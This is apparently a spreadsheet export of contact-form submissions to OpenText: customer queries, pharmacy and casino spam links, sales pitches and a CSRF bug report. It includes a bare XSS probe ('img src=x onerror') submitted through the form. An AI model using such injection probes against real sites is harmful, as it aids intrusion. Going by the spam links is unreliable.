&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/541/&gt;купить зелбораф в москве&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/573/]инлита цена[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/]imbruvica ибрутиниб 140 мг[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hey,_x000D_
_x000D_
I hope you are doing well,_x000D_
_x000D_
I am checking in to see if you are interested to acquire a comprehensive list of decision makers from the companies/accounts that use Red Hat Enterprise Linux Server currently?_x000D_
_x000D_
We also have recently compiled a validated list of companies using Android,Windows 10, Fedora,Oracle Linux,Debian,Ubuntu,Chromium OS.,etc._x000D_
_x000D_
Each contact includes Contact Name, title, email, phone, fax, company -name, web, physical address (City, state, country), revenue, employee size, SIC code, NAICS code, Primary industry and Technology type._x000D_
_x000D_
If you think I should be talking to someone else in your company, please forward this email to him/her._x000D_
_x000D_
I appreciate your time and consideration in advance._x000D_
_x000D_
Best Wishes,_x000D_
_x000D_
Ara Gates</t>
  </si>
  <si>
    <t xml:space="preserve">Новое лечение гепатита С в России, препараты для лечения гепатита С вы можете закзать у нас, консультация врача бесплатно _x000D_
 _x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/551/&gt;lynparza olaparib олапариб&lt;/a&gt;_x000D_
&lt;a href=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/575/&gt;кипролис инструкция&lt;/a&gt;_x000D_
 _x000D_
 _x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/570/]ибрутиниб инструкция[/url]_x000D_
[url=https://sofosbuvir-express24.ru/lekarstvo-ot-raka/568/]зикадиа[/url]_x000D_
</t>
  </si>
  <si>
    <t>Looking for a cloud based faxing service for our customer service department.</t>
  </si>
  <si>
    <t>I'm trying to find your eLearning TLi schedule for next quarter.</t>
  </si>
  <si>
    <t>Interested in CRM / Automated outreach</t>
  </si>
  <si>
    <t>Hello, I am looking for information in how Open Text can assist with implementing a Digital Asset System at SCETV.</t>
  </si>
  <si>
    <t>I am looking for pricing on and email to fax solution for a customer, can you assist?</t>
  </si>
  <si>
    <t>I keep requesting and confirming emails, but I still keep getting the following message when I try to access support::_x000D_
OpenText Connect /No Access_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
Almost there!_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
I keep confirming but nothing changes?_x000D_
Can someone take a look?_x000D_
Thanks,_x000D_
Doug</t>
  </si>
  <si>
    <t>We are a consulting organization doing a project for a major healthcare client and are reviewing their Knowledge Management tools.  We would like to request a demonstration of your current authoring and KM tools to understand your current functionality.  Thank you in advance and I look forward to hearing from you.  Kimela Tipton</t>
  </si>
  <si>
    <t>Would like to receive pricing on purchasing 10 user license for OpenText Exceed</t>
  </si>
  <si>
    <t>Hi- I have a K-12 school customer in Iowa interested in a fax server.  Can you let me know who my contact is for this opportunity and what info is needed to build a proposal.  Thanks!  Adam</t>
  </si>
  <si>
    <t xml:space="preserve">Heather Urbanik (hurbanik@opentext.com) suggested that I contact you._x000D_
I am contacting on the behalf of the product development teat at Fuji Xerox, in Yokohama, Japan.  Fuji Xerox is a multifunction printer supplier to Xerox.  We would like Fuji Xerox to confirm that the products that they are developing for Xerox are compatible with the RightFax product line._x000D_
_x000D_
Our OpenText partner manager, Heather Urbanik, suggested that I request an NFR for Fuji Xerox.  _x000D_
_x000D_
Here is the information for Fuji Xerox's contact person for the NFR:_x000D_
_x000D_
Haruhisa Hoshino_x000D_
Controller Platform Development IV_x000D_
Software Development Group_x000D_
Fuji Xerox Co., Ltd._x000D_
_x000D_
Minato Mirai 18F_x000D_
6-1 Minato Mirai, Nishi-Ku, Yokohama, Kanagawa 220-8668 JAPAN_x000D_
Haruhisa.Hoshino@fujixerox.co.jp_x000D_
_x000D_
Please let me know if you require any additional information._x000D_
_x000D_
Regards,_x000D_
/Don_x000D_
</t>
  </si>
  <si>
    <t>QUERIA IMPORTAR ESTOQUE DE OUTRO SISTEMA</t>
  </si>
  <si>
    <t>My company has a large volume fax client that is looking to bring their fax business back in-house, as transaction costs for their volume are so large. I need to talk to someone about scaling for a system this large to get an idea of how many clustered servers, workservers, etc, for a FOIP-based Rightfax system with monthly volume of 30m faxes with OCR on all inbound, plus XML generation for intake into their custom application.</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>We are interested in a demo. Please have someone contact me to set up an initial call. Email works best.</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://onlinelistcasino24.com/]casino games real money[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;play casino games online&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN: MARKETING_x000D_
RE: ASUG ANNUAL CONF. 2018_x000D_
_x000D_
Dear Exhibitor,_x000D_
_x000D_
ASUG, 2018 is coming up, if you need flooring or a new booth,  let us send you a free quote.  We specialize in certain areas from high end, simple or turnkey. We can deliver with flooring, booth design and labor rolled into one or we can provide our services separately based on your needs.  We can refurbish and reskin your old booth.  We now do carpet inlay and subfloor construction. You do have the choice of an EAC, we partner with LMS for our EAC services.  Drayage/material handling is charged by the general contractor of the show. _x000D_
_x000D_
 Please check us out on our Facebook page, Floor Space, Inc. and online at floor-space dot net._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Erin Mccormack_x000D_
Account Executive_x000D_
_x000D_
Floor Space, Inc. _x000D_
Out of this world event flooring_x000D_
_x000D_
_x000D_
3749 E. 150 SO.  TIPTON,  IN.  46072_x000D_
765-513-4763 Mobile_x000D_
_x000D_
References upon request_x000D_
Extensive graphic work will require deposit prior to work._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need access to Opentext portal. Need Knowledge Center access and the ability to submit trouble/issue tickets.</t>
  </si>
  <si>
    <t>I am looking to evaluate TeamSite for a client and would like to either have a guided walk through or a demonstration of the site so that I may speak knowledgeably about it in a proposal session we have coming up in a week. If someone could email or call me at your earliest convenience, I would greatly appreciate it.</t>
  </si>
  <si>
    <t>Sehr Damen und Herren,_x000D_
wir überlegen uns als Firma ob wir mit Ihnen zusammenarbeiten könnten bzw. ein von Ihren Produkten verwenden könnten._x000D_
ich aber Ihre Produkte leider nicht so gut kenne, bin ich mir nicht sicher, welches Produkt uns am besten passen könnte. _x000D_
_x000D_
Wahrscheinlich sagen Sie mir lieber schon was uns am besten passen könnte._x000D_
_x000D_
Das sind unsere Anforderungen: Wir brauchen ein Komponente von OCR, die lokal bei uns bzw. auf einem unseren Server eingesetzt ist, die Dateien (PDF bevorzugt, mit viel Text und Bilder drin) _x000D_
erkennt (eventuell mehr als 30 000 Dateien mit 1-2 Seiten pro Monat) und in ein Text Format (.TXT) umwandelt. Weitere Klassifizierungen von erkannten Dateien brauchen wir nicht. _x000D_
_x000D_
Uns wäre dabei wichtig:_x000D_
1.	Die OCR Komponente soll voll die deutsche Sprache (eventuell Englisch und andere Sprachen) unterstützen_x000D_
2.	Web Services und zwar SOAP Service Unterstützung von OCR _x000D_
3.	Lieber Multi Plattform Unterstützung (Windows und Linux Servers)_x000D_
4.	Vorprüfen der Datei nach Korrektheit des Typs (Statistik Durchführung). _x000D_
5.	OEM Lizenz, royalty-free Lizenz?! Wir würden uns hauptsächlich auf günstige Lizenztypen freuen_x000D_
6.	Java Entwicklung SDK _x000D_
_x000D_
Ich würde mich außerdem für die Preise/Lizenzen interessieren. Vielen Dank._x000D_
_x000D_
Sie können mich gerne auch telefonisch erreichen wenn Sie möchten. 06151 3681500_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Andrey Boivalenko_x000D_
saascom GmbH, Deutschland</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to move to a enterprise Digital Asset Management system. Looking for to see what Open text can offer in terms of helping out SCETV. Also to see if you can handle the multiple formats and programs associated with the brand. </t>
  </si>
  <si>
    <t>Interested in RightFax solution integration with current EHR Netsmart Homecare.</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon,_x000D_
_x000D_
I am contacting you from Business Reporter at the Telegraph Online in relation to a campaign I have just started on "The Future of Supply Chains"._x000D_
_x000D_
I wanted to have a discussion with someone at Opentext to learn about the work you do in the sector._x000D_
_x000D_
If it was something relevant to the angle I was positioning the campaign - a series of informative interviews, highlighting the necessity of transforming supply chain infrastructure - I would also like to discuss possible involvement within this series. _x000D_
_x000D_
If somebody could contact me back either on the email address I have given or on my number I would love to start this conversation. _x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Lana_x000D_
</t>
  </si>
  <si>
    <t>Looking for document capture (Scanning) and document management applicaiton</t>
  </si>
  <si>
    <t>Participating in a tender for mega project in Egypt and there is a requirement for "Forensic Investigation System &amp; Threat management System".</t>
  </si>
  <si>
    <t>participating in a tender for a mega project in Egypt and there is a requirement for "Forensic Investigation System &amp; Threat management System"</t>
  </si>
  <si>
    <t>Pricing for "OpenText Analytics Suite_x000D_
 - Production Server (2) - Unlimited Users_x000D_
 - Staging Server (2)</t>
  </si>
  <si>
    <t xml:space="preserve">• I just found Cross-Site Request Forgery(CSRF) In Contact Form in your Website._x000D_
• Target Link: https://www.opentext.com/who-we-are/contact-us/contact-opentext_x000D_
• Overview this bug:_x000D_
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful._x000D_
• More about attack scenario at https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_x000D_
• Solve this bug: Attach Captcha in form. link: https://www.google.com/recaptcha/intro/_x000D_
• I am sending a video link as proof of concept (PoC) _x000D_
_x000D_
• https://drive.google.com/open?id=1-F-c2T9tgj-DAxwtZvR2gjI6qjZEl-97_x000D_
 _x000D_
_x000D_
Please watch this video to understand it clearly._x000D_
</t>
  </si>
  <si>
    <t>Would like to setup presentation of products and services. Email contact would be preferred.</t>
  </si>
  <si>
    <t>I have licence for Problems installing Imaging for Windows Developers Resources 4.0.But while installing it never asks for licence file.Request someone from open text to help me out on this.</t>
  </si>
  <si>
    <t>hello</t>
  </si>
  <si>
    <t>HELLO</t>
  </si>
  <si>
    <t>hello opentext</t>
  </si>
  <si>
    <t>system administrator indicating  our  trading account has been locked. _x000D_
Kindly sort out the  issue,.</t>
  </si>
  <si>
    <t>n</t>
  </si>
  <si>
    <t>J5</t>
  </si>
  <si>
    <t>hdjd</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at Document Management system._x000D_
_x000D_
regards, _x000D_
</t>
  </si>
  <si>
    <t>Administrator role to Documentum. Now Sakari Roininen. New admistrator Seppo Sorsa</t>
  </si>
  <si>
    <t>&lt;img src=x onerror=alert(2)&gt;</t>
  </si>
  <si>
    <t>We are looking to procure new EDMS for our organisation, would like to discuss further and organise a demo for our management asap</t>
  </si>
  <si>
    <t>learning some products of OTCS, and using more product of OTCS</t>
  </si>
  <si>
    <t>To get 3 local partners/supports to inquiries the technical and compare one for future use of OpenText RightFax.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ;_x000D_
_x000D_
We want to buy the "Brava PDF,Image,AutoCad &amp; Microstation". Your payment system only accepts PayPal.Paypal is not available in Turkey.We can only pay by credit card. How can we buy this product in this case?_x000D_
</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino online&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t xml:space="preserve">Respected  sir / Mam_x000D_
                                                 Sorry for inconvenience we  from  Sai Hanuman  Realstate  in GUNTUR  at present new capital city of Andhra pradesh is rapidly developing , so most of the employees are interested to purchase plots  in Guntur surroundings and new capital city surroundings  in this aspects  I’m requesting please introduce some of your employees  details  I want your co-operation regarding  purchasing CRDA approved plots  from your employees , so this is the right time to purchase any property in Guntur and new capital city surroundings._x000D_
Regards  :_x000D_
Email       : mkramu@yahoo.co.in_x000D_
Website  :www.gunturrealstate.com_x000D_
Mkramu   :9885198739_x000D_
Address  : 4-16-509/1,Arundelpet,19/1,Near Vijaya Hospital,Guntur._x000D_
</t>
  </si>
  <si>
    <t>Hi, one from out clients, a bank wants a presentation for a digital solution from opentext and WE would Like to get someone who Can help us for this presentation</t>
  </si>
  <si>
    <t>I can not complete payment when I add autoCAD only to the shopping cart. Is it possible to buy in a other way?</t>
  </si>
  <si>
    <t xml:space="preserve">I just registered today on your OpenText Connect page.  The site displayed a message saying  that "a link to complete the registration has been sent to the email address you provided.", however, the email hasn't come through.  I wonder if perhaps I've made a typo on the registration form.  Could someone please check?  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, are you looking for prospects list for your marketing campaign?  We have  7,197_x000D_
AS400  Customers from  Australia._x000D_
Lets us know if you would like to receive test file without any obligations. _x000D_
Let me know your interest on the same. _x000D_
Regards_x000D_
_x000D_
Lydia Serwadda _x000D_
Marketing Director_x000D_
Technologytapp_x000D_
lydia.serwadda@technologytapp.com _x000D_
</t>
  </si>
  <si>
    <t>looking for CMS product integrated with Open Text for a project in Kuwait</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
Hi, hope you are a OpenText consultant. _x000D_
_x000D_
We have 784 Ready-To-Buy OpenText Technology Customers List from Australia._x000D_
_x000D_
Test file will be given to review and check quality. _x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
_x000D_
Thank you _x000D_
_x000D_
_x000D_
Regards _x000D_
_x000D_
Maggie Tylor _x000D_
maggie.tylor@zomo-online.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I want to use Exceed on demand from a PC that I can not install programs,_x000D_
I can only run, is there any version similar to putty or WinSCP that I can run it without installing._x000D_
_x000D_
Kind Regards_x000D_
Sincerely_x000D_
Amin</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I enjoyed reading your article at https://blogs.opentext.com - https://blogs.opentext.com/2017-capture-technologies-review-predictions-2018/_x000D_
_x000D_
Based on your content, I think our tool "Uscreen" might be interesting for your audience. My name is PJ and I am the President of Uscreen. Our platform helps anyone monetize videos &amp; expand their reach globally, a lot of our customers are marketers educate their audience with educational videos._x000D_
_x000D_
Are you open in doing a review and write up about Uscreen?_x000D_
I would appreciate a few minutes of your time and discussing this further if its of interest to you._x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
_x000D_
Regards,_x000D_
PJ_x000D_
Uscreen.tv _x000D_
1-877-626-3374</t>
  </si>
  <si>
    <t>Warm greetings!_x000D_
_x000D_
I would like to apply on any open IT related position that may help me, a fresh graduate to  grow my career in the IT industry. _x000D_
_x000D_
I would be willing to send my CV upon your response on this message._x000D_
_x000D_
Thank you very much._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
Enrico Granda</t>
  </si>
  <si>
    <t>Hi, I'm Akiko in Japan Marketing team._x000D_
I'd like to know who is in chage of this website._x000D_
Please email me if you see this massage._x000D_
Thank you for your kind help!</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]online slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>real money casino _x000D_
[url=http://onlinelistcasino24.com/]online casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Hi DNS Team,_x000D_
Re: hummingbird.com_x000D_
I have a client who is looking for a suitable name for their new business and one name we _x000D_
were looking at was hummingbird.com. Just wondering if you were interested in selling the domain name _x000D_
and if yes what price you would consider. If this is not the best contact could you let me know who I should be _x000D_
contacting with my enquiry._x000D_
_x000D_
I am a .au registrar and people from time to time ask me to make enquiries on their behalf._x000D_
_x000D_
Regards,_x000D_
_x000D_
Liz Keys_x000D_
_x000D_
Domain Manager_x000D_
_x000D_
First registrar certified ISS data security compliant 2013_x000D_
_x000D_
Domain Names . Hosting . Corporate Management_x000D_
_x000D_
Discount Domain Name Services Pty Ltd_x000D_
T + 61 3 9815 6868_x000D_
F + 61 3 9815 6800_x000D_
E liz@ddns.com.au_x000D_
</t>
  </si>
  <si>
    <t>Hello OpenText team,_x000D_
_x000D_
from Monday 23rd to Tuesday 24 of July I am visiting a developer's team in London and would be glad to see you afterwards._x000D_
_x000D_
At this time I am working with a team for a project of civil services. Unfortunately the contracting authority is willing to leave the Team Developer platform and hopefully you could help me with some convincing arguments._x000D_
_x000D_
Another customer (Container Terminal at Hamburg Harbour) of mine is also leaving the Team Developer platform. With one project I succeeded against SAP so a very little flame of TD ist left there._x000D_
_x000D_
Best regards_x000D_
Henning Frisch_x000D_
HFSNET_x000D_
Seestr. 23_x000D_
23821 Rohlstorf</t>
  </si>
  <si>
    <t>Hello! _x000D_
_x000D_
We are a partner of yours and are getting questions from clients about ongoing support of our integrations with your upcoming releases of OpenText DM 16.x. I was wondering if I could get some time with the relevant person to open discussions around current, as well as future, product support and opportunities for us to work together? _x000D_
_x000D_
I'd also welcome the opportunity to update some of our information on the partner pages of your website if possible:_x000D_
https://www.opentext.com/what-we-do/partners-and-alliances/partner-directory/partner-directory-detail?id=001D000000lL0DTIA0_x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Ayman Hatem.</t>
  </si>
  <si>
    <t>Buen día:_x000D_
_x000D_
Represento a la Compañía Sistemas de Información Geográfica S.A. de C.V. ubicada en la Ciudad de México y que es dirigida por el Ing. Carlos Salman. Estamos muy interesados en conocer los productos referentes a los Enterprise Content Management, nos gustaría conocer a fondo su producto para poder integrar su solución a un conjunto de desarrollos y productos que manejamos y ser socios comerciales._x000D_
_x000D_
Nos gustaría tener contacto con algún representante en la Ciudad de México y requeriríamos una reunión donde pudieran mostrarnos alguna demo de funcionamiento de sus aplicaciones ECM.</t>
  </si>
  <si>
    <t>Zappos has an OpenText account, but we would like to know if Product Category is captured in the information that Open Text provides.  Currently we use it for style name/number/season code, etc. Looking to add product type (sandal, sneaker, bag, accessory etc.) Does Open Text have this information? Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Boa tarde! _x000D_
_x000D_
Gostaria de obter informações sobre o software para classificação automática de documentos. _x000D_
O interesse pelo assunto ocorreu quando visitei essa página:_x000D_
https://www.opentext.com/what-we-do/products/discovery/auto-classification_x000D_
_x000D_
Atenciosamente, _x000D_
_x000D_
Rafael de Oliveira Saiani Franco_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Жизнь современной женщины соткана из тысячи мелочей. Муж, дети, дом, работа – все это уже давно мы научились нести на наших хрупких плечах с высоко поднятой головой. А так хочется иногда расслабиться и быть просто женщиной, нежной и беззащитной. Но жизнь диктует свои правила. И в первую очередь современная женщина должна быть Хозяйкой. Настоящей Хозяйкой во всем. Подробнее читайте на сайте [url=http://xozyaika.com]xozyaika.com[/url]</t>
  </si>
  <si>
    <t>I would like to register 2 Canadian students at $1,500.00 CAD and pay by MasterCard for the Mar 21-22, 2018 3-0300 course.  Please advise how to proceed.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Am an IOS Developer, having around 5 years exp as an iOS development.I have done 7 apps which is supported for iPhone.Please go through my profile and let me know any required documents._x000D_
_x000D_
Previous Company :Software International Corporation ,_x000D_
                                  Bukit jalil, Kuala Lumpur _x000D_
_x000D_
Regards_x000D_
P.Lakshmi Kumar_x000D_
+91 9663959054</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Documentum D2 &amp; D7  online training schedule and price for each course.  </t>
  </si>
  <si>
    <t>Pay for invoice with credit card.</t>
  </si>
  <si>
    <t>Cannot access site. We are trying to access and install another copy of what we purchased and get the following in my login area "No Access_x000D_
We're sorry, your account does not grant you access to this resource."_x000D_
Please let know as soon as possible as we are trying to get someone up and running._x000D_
Thanks</t>
  </si>
  <si>
    <t>Шампанское ассоциируется у людей с праздником. Среди разных его сортов особое место занимает брют. Этот напиток родом из Шампани (провинция во Франции) имеет легкий вкус и свежий аромат. Читайте об этом подробнее на сайте [url=http://ladystory.ru]ladystory.ru[/url]</t>
  </si>
  <si>
    <t>Привет всем участникам! Класный у вас сайт! _x000D_
Нашёл новости в сети: [url=http://energynews.su/4928-minenergo-ukrainy-obyasnilo-snizhenie-obemov-zakupok-rossiyskogo-gaza-teploy-pogodoy.html] Минэнерго Украины объяснило снижение объемов закупок российского газа теплой погодой [/url] _x000D_
http://energynews.su/25020-dlya-vdv-rf-sozdan-sverhprochnyy-universalnyy-noutbuk-voennyy-obozrevatel.html _x000D_
http://energynews.su/28422-premer-serbii-pozdravil-rossiyan-sdnem-pobedy-narusskom-yazyke-video.html _x000D_
[url="http://energynews.su/"]http://energynews.su/[/url]</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://onlinelistcasino24.com/]casino slots[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Would it be possible to get an invoice for invoice #RC214780 _x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for scanning software such as your OpenText Imaging Enterprise Scan and/or Document Capture. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Could you please help us in resolving issue regarding multiseleciton of vairous levels of the dropdowns_x000D_
_x000D_
currenty birt tool only providing selction of multlile values in end of the dropdowns_x000D_
_x000D_
please help me out in selction of mutiple values at any levels_x000D_
_x000D_
I have tried changing paramType attribute from "simple" to "multi-value".but I am unable to get the current selected level multiple values._x000D_
_x000D_
Please help me out struggling form last 3 day hardly</t>
  </si>
  <si>
    <t>I have a client that uses SAP OpenText and is deployed on EMC Centerra storage. Do you have a list of supported storage devices? The client is wanting to move off Centerra but is unsure how OpenText would behave if a different storage array is introduced. Thanks</t>
  </si>
  <si>
    <t>UTILIZZO PER APRIRE FILE DWG</t>
  </si>
  <si>
    <t>Please send me a PMC key for Gupta SQLBase desktop version 8.5. Thanks,_x000D_
John Mc</t>
  </si>
  <si>
    <t>java heap space blowing up. _x000D_
_x000D_
2018-03-12 02:01:18 Commons Daemon procrun stdout initialized_x000D_
Error occurred during initialization of VM_x000D_
Could not reserve enough space for object heap_x000D_
_x000D_
I need to know if I can define heap space manually. thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Please provide details of the vendor invoice scanning an posting process in SAP. Approx. cost for implementation and time required.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I would like to get some more information regarding a purchase of 10+ Brava Desktop programmes. _x000D_
_x000D_
Please can someone call/email me asap. _x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Nyall_x000D_
 </t>
  </si>
  <si>
    <t>We are upgrading/installing ApplicationXtender 8.1 to eventually replace our AX 6.5SP2.  There will be a period where our AX License server will be the old 6.5 License server.  Is AX 8.1 compatible with AX6.5 license server?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">We are working with a client, who is currently running open text on outlook 2007/2010 we are looking to upgrade them to windows 10 and office 365. if someone could let me know if it is possible to upgrade the services and, and the steps necessary, so we can upgrade them over to the latest version of outlook. _x000D_
_x000D_
Very Respectfully, _x000D_
Tyler Hall </t>
  </si>
  <si>
    <t>Access to Opentext - MySupport Page. I need the access to download the Hotfixes for the StreamServe 5.6.2</t>
  </si>
  <si>
    <t xml:space="preserve">LEAP - beta sing-up_x000D_
-----------------------------------------------------------------_x000D_
Dear Sir or Madam,_x000D_
_x000D_
our company would like to join the LEAP beta program._x000D_
_x000D_
Trask Solution already had access because one of our customers had interest of product. But finally, there was no time to deal with the issue._x000D_
_x000D_
Now we would like to reopen this question because we believe that this product has the potential for our customers._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Václava Kučerová Zrálíková_x000D_
Analyst_x000D_
_x000D_
Note: Today I tried contact you via email Leap Platform@opentext.com and I got this:_x000D_
_x000D_
#550 5.7.1 RESOLVER.RST.AuthRequired; authentication required ##_x000D_
_x000D_
Received: from wldmzsvc05.dmz.opentext.com (10.2.170.16) by_x000D_
 otwlxg10.opentext.net (10.2.103.151) with Microsoft SMTP Server (TLS) id_x000D_
 14.3.339.0; Mon, 12 Mar 2018 08:20:02 -0400_x000D_
Received: from mx0a-00102601.pphosted.com (mx0a-00102601.pphosted.com_x000D_
 [67.231.144.228])	by wldmzsvc05.dmz.opentext.com (8.14.4/8.14.4) with ESMTP_x000D_
 id w2CCK1E3014854	(version=TLSv1/SSLv3 cipher=AES256-SHA256 bits=256_x000D_
 verify=NO)	for &lt;LeapPlatform@opentext.com&gt;; Mon, 12 Mar 2018 08:20:01 -0400_x000D_
Received: from pps.filterd (m0000803.ppops.net [127.0.0.1])	by_x000D_
 mx0a-00102601.pphosted.com (8.16.0.22/8.16.0.22) with SMTP id w2CCCTYa031662_x000D_
	for &lt;LeapPlatform@opentext.com&gt;; Mon, 12 Mar 2018 08:20:00 -0400_x000D_
Authentication-Results: ppops.net;_x000D_
	spf=pass smtp.mailfrom=vzralikova@trask.cz;_x000D_
	dkim=pass header.d=trask.onmicrosoft.com header.s=selector1-trask-cz;_x000D_
	dmarc=none_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I opened a support case regarding upgrading our environment from IBM Domino Mail system to Office 365 and they directed me to Professional Services.   We currently have a RightFax server configured with our IBM Domino Mail system and are in the beginning stages of migrating to Office 365 Mail.  We will need to also migrate our RightFax Server to this new environment.  </t>
  </si>
  <si>
    <t>Solicitar um demo do content management.</t>
  </si>
  <si>
    <t>Hi, I am reviewing Opentext for a Client and I have a few quiestions regarding your solution:_x000D_
1. Does Opentext support Scalable repositories: alas: dynamically expandable storage capacity?_x000D_
2. How does Opentext support Bulk import and export of content?_x000D_
3. Does Opnetext create files and documents, and index existing ones with unique global IDs?_x000D_
4. How does Opentext handle Template definition and management?_x000D_
5. How does Opentext handle Configurable user notification for updates on e.g. repository, document type, document?_x000D_
_x000D_
Best Regards,_x000D_
Amund</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for job opportunity </t>
  </si>
  <si>
    <t>I was interested in the DWG viewer wich we have used for autocad only. I filled in the form on your website, and saw that OpenText is going to contact me. When are you going to contact me, we would like to test the software, so we could decide to buy it or not buy it.</t>
  </si>
  <si>
    <t>#0073018228 Vertragsnummer_x000D_
Hallo,_x000D_
Wir haben die Anwendung OpenText Archive Center im Einsatz. Aufgrund unserer Rechenzentrumsumgebung sind wir gezwungen auf Oracle 12.2 umzustellen. Wir erhielten von unserem Dienstleister die Aussage, dass die Unterstützung für Oracle 12.2 ist als Feature Candidate für das Update auf Archive Center 16.2.2 geplant ist. Können Sie das bestätigen?_x000D_
Welche Entwicklungsroadmap gibt es, an der wir uns orientieren können?_x000D_
Wann können wir verlässlich mit einer Unterstützung  für Oracle 12.2 rechnen?_x000D_
_x000D_
_x000D_
 Vielen Dank im Voraus</t>
  </si>
  <si>
    <t>Looking for OpenText Content Suite and related products Training</t>
  </si>
  <si>
    <t>The activation of captiva server license (119276), provided to FEDASO. At installation, _x000D_
we have detected that "General-Use ICR" feature isn’t enabled for this license. But, the same feature is activated for the other license (109307).</t>
  </si>
  <si>
    <t>Schulungsanmeldung</t>
  </si>
  <si>
    <t xml:space="preserve">we currently have Brava loaded on another hp laptop and wish to still run that but also run the same system on a new macbook air laptop - can you help and advise costs involved please </t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://onlinelistcasino24.com/]casino online[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online casino games&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>Dear Sir/Madam _x000D_
_x000D_
Please provide me the contact details for the companies or persons handling all subjects belong to OpenText product in QATAR._x000D_
_x000D_
Best regards</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
Please send us quotation for Open Text Brava! Desktop = 25 Nos (Users). as soon as possible. _x000D_
_x000D_
We appreciate if you clarify stock availability and delivery time in your offer._x000D_
_x000D_
Have a good day!_x000D_
_x000D_
Regards_x000D_
Faizul Rahman</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://onlinelistcasino24.com/]casino games[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;online slots&lt;/a&gt; _x000D_
real money casino</t>
  </si>
  <si>
    <t>online slots _x000D_
[url=http://onlinelistcasino24.com/]real money casino[/url] _x000D_
&lt;a href="http://onlinelistcasino24.com/"&gt;real money casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Dear,_x000D_
we have OpenText system in our organization, we are looking for someone to give us maintenance and support in Oman._x000D_
_x000D_
please provide us those offices in Oman._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sirs:_x000D_
